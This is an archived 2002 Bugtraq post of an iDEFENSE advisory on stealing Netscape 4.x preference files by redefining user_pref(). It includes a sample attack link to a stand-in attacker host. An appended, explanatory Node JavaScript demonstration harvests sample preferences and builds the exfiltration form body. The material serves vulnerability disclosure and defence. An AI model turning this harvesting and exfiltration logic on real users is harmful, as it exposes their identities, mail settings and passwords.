85220 2002-11-23 10:21 /108 lines/ David Endler <dendler@idefense.com>
Imported: 2002-11-23 10:21 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: dendler@idefense.com
Recipient: Bugtraq (import) <2498>
Subject: iDEFENSE Security Advisory 11.19.02c: Netscape Predictable Directory Structure Allows Theft of Preferences File
------------------------------------------------------------

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 11.19.02c:
http://www.idefense.com/advisory/11.19.02c.txt
Predictable Directory Structure Allows Theft of Netscape Preferences File
November 19, 2002

I. BACKGROUND

Netscape Communications Corp.'s Communicator is a popular package that
includes a web browser (Navigator), an e-mail client, a news client, and an
address book.

II. DESCRIPTION

Socially engineering a user of Netscape Communicator 4.x's web browser or
e-mail client into clicking on a malicious link can return the contents of
that user's preferences file (prefs.js) to a remote attacker.

The attack relies on redefining user_pref(), an internal JavaScript function
that Communicator calls once per stored preference when prefs.js is
evaluated. The redefined function collects every preference it is called
with into a single string, stores that string in a hidden form field, and a
second JavaScript routine later submits the form to the attacker.

Communicator only allows local files to redefine internal functions, so the
attacker must host the exploit script on a Windows (or Samba) share and
coerce the victim into following a link to it. A sample link to such an
attack script would look like file:///attacker.example.com/thief.html.

III. ANALYSIS

Remote exploitation allows an attacker to steal the victim's user
preferences, including the victim's real name, e-mail address, e-mail
server, URL history and, in some cases, e-mail password.

IV. DETECTION

Netscape Communicator 4.x is vulnerable. Communicator 6 and later is not
vulnerable, since it stores the prefs.js file in a randomized location.

V. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
assigned the identification number CAN-2002-1204 to this issue.

VI. DISCLOSURE TIMELINE

08/29/2002  Issue disclosed to iDEFENSE
10/14/2002  Netscape notified (support@netscape.com, info@netscape.com,
            pradmin@netscape.com)
10/14/2002  iDEFENSE clients notified
10/31/2002  Second attempt at vendor contact
11/07/2002  Third attempt at vendor contact
11/19/2002  Public disclosure

VII. CREDIT

Bennett Haselton (bennett@peacefire.org) discovered this vulnerability.

Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to listserv@idefense.com, subject line: "subscribe"

About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world, from technical vulnerabilities and
hacker profiling to the global spread of viruses and other malicious code.
Our security intelligence services provide decision-makers, frontline
security professionals and network administrators with timely access to
actionable intelligence and decision support on cyber-related threats. For
more information, visit http://www.idefense.com.

- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071
dendler@idefense.com
www.idefense.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPdrFIUrdNYRLCswqEQJO8QCeLSkaHcdHYKxSR+4gP4b3gX8KADcAnj7p
M0apHRqvhaWN4jthj57zhgNO
=QPPR
-----END PGP SIGNATURE-----
(85220) /David Endler <dendler@idefense.com>/-------
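The harvesting mechanism described in section II of the advisory, as an added example that is not part of the advisory or of any iDEFENSE or Netscape code. It runs under Node rather than inside Communicator: the prefs.js content is constructed sample text with illustrative preference names, the way the attacker's page gets prefs.js evaluated is assumed and stood in for by `new Function`, and the hidden-field name `prefs` and the "sensitive" name patterns are assumptions for illustration only. What it shows is why redefining one function is enough: a prefs.js file is nothing but a list of user_pref() calls, so whoever owns user_pref() when that file is evaluated sees every preference in it.

```javascript
// Added example (not from the advisory): the harvesting half of the attack
// in section II, run outside a browser so it can be executed under Node.
//
// Netscape 4.x's prefs.js is a sequence of user_pref("name", value) calls
// that the browser evaluates as JavaScript. If a page Communicator trusts
// (a local file:// page, per the advisory) redefines user_pref() before
// that file is evaluated with the redefinition in scope, every call lands
// in the attacker's function. How the attacker's page gets prefs.js
// evaluated is assumed here; new Function stands in for it.

// Constructed sample prefs.js content; preference names are illustrative,
// not taken from a real user's file.
const SAMPLE_PREFS_JS = `
user_pref("mail.identity.username", "Jane Doe");
user_pref("mail.identity.useremail", "jane@example.com");
user_pref("network.hosts.pop_server", "mail.example.com");
user_pref("browser.startup.homepage", "http://www.example.com/");
user_pref("mail.remember_password", true);
user_pref("browser.cache.disk_cache_size", 7680);
`;

// The redefined user_pref(): records each preference instead of setting it.
function makeCollector() {
  const entries = [];
  function user_pref(name, value) {
    entries.push(name + "=" + String(value));
  }
  return { user_pref, entries };
}

// Evaluate prefs.js text with the redefined user_pref() in scope and return
// the "name=value" lines the attacker would place in a hidden form field.
function harvestPrefs(prefsSource) {
  const { user_pref, entries } = makeCollector();
  new Function("user_pref", prefsSource)(user_pref);
  return entries;
}

// Body of the form submission the advisory says a second routine sends:
// one hidden field (name assumed: "prefs") carrying everything harvested.
function buildFormBody(entries, fieldName = "prefs") {
  return fieldName + "=" + encodeURIComponent(entries.join("\n"));
}

// Defender's view: of everything harvested, which entries match the kinds
// of data the advisory calls out (identity, mail server, password-related)?
// The name patterns are assumptions matching the constructed sample above.
function sensitiveEntries(entries) {
  const sensitive = /^(mail\.identity\.|network\.hosts\.|mail\.remember_password)/;
  return entries.filter((e) => sensitive.test(e.split("=")[0]));
}

if (typeof require !== "undefined" && require.main === module) {
  const entries = harvestPrefs(SAMPLE_PREFS_JS);
  console.log(entries.join("\n"));
  console.log(buildFormBody(entries));
  console.log("sensitive:", sensitiveEntries(entries));
}
```

Two properties make the attack work, and both are visible in the code: the collector never needs to parse prefs.js, because the browser's own evaluation of the file does the parsing and hands each value to user_pref(); and the file is worth fetching at all only because its path is predictable, which is the property Communicator 6 removed by randomizing the profile directory. Blocking file:// links from mail and web content, or treating them as untrusted rather than local, removes the precondition that the malicious page be "local".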